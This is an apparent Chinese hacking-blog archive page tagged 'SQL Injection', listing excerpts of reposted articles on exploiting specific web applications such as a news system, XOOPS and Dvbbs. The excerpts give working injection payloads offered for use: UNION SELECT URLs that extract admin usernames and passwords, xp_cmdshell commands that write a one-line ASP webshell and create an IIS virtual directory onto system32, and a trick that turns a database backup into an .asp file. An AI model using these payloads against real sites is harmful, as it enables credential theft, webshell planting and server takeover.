标签 ‘SQL Injection’ 下的日志

动易2006网站管理系统NewComment.asp页面参数过滤不足导致sql注入漏洞

鬼仔注:
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。

h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!

信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )

发布日期:2006-10-18 应急事件响应公告(BCTCERA0607)
阅读全文 »

Tags: , , ,

SQL INJECTION的终极利器opendatasource和openrowset

鬼仔注:很老的文章了,05年4月份的,存档。文章末尾提供DOC文档和文中提及的工具下载,其中DOC文档来自neeao那里,工具是我google了好长时间才找到的,不知道为什么这么难找。

作者:LCX

目前市面上的SQL INECTION工具很多,最受推崇的当属NBSI了。SQL INECTION的方法在网上是也是满天飞,大家仔细学一下都会很快的成为脚本入侵高手。可是无论是工具,还是众多方法,猜SQL数据的时候原理不外乎两种。一个是对方的WEB服务器在没有关闭错误提示的时候是用让SQL出错来暴出想要的信息;一个是在对方的WEB服务器关闭错误提示的时候采用ASCII码拆半分法分析。当关闭错误提示的时候,这时来猜数据就很慢了,遇到网速蜗牛的时候真是急死人,NBSI此时还经常会出现猜解错误是 阅读全文 »

Tags: , , ,

沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用

来源:C.Rufus Security Team
by cooldiyer

+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2

后台“图文管理”里添加文章,上传一个flash文件
点附加管理里的备份压缩
数据库地址为只读
打开恢复数据库窗口。IE输入
javascript:alert(window.frames[‘list’].document.forms[0].backpath.value=”/data/x.asp”);
阅读全文 »

Tags: , ,

最详细的SQL注入相关的命令整理

鬼仔注:一样老文,存档。其实文中很多东西以前都曾经发过,不过这个是总结性的。发一下,方便我自己,也方便大家查阅。

来源:H4x0r's Blog

1、 用^转义字符来写ASP(一句话木马)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';–

? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2、 显示SQL系统版本:
? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
阅读全文 »

Tags: ,

SQL注入建立虚拟目录

鬼仔注:老文,刚才发 上篇 文章的时候想起来这篇文章,以前没发过,保存一下。

来源:H4x0r's Blog

我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
阅读全文 »

Tags: ,

phpwind 5.0.1 Sql注射漏洞利用程序

来源:寒水芊芊's blog
阅读全文 »

Tags: , , ,

oops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

构造url语句:

/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*


Tags: , , , ,

动网论坛(SQL版)后台注入方法

作者:肉丝
文章首发至NSP论坛

假如通过某些方式进了动网后台,但是管理员牺牲上传的功能把网站目录权限设置为禁止写入,或者说允许某些目录写入但是没有脚本执行权限,怎么办?大家都知道sql版好歹也可以差异备份,但是呢,注入点在那.前台?呵呵!我想不是大牛一般没人还能找到了吧.既然进了后台,大家就从后台找找看.
阅读全文 »

Tags: , ,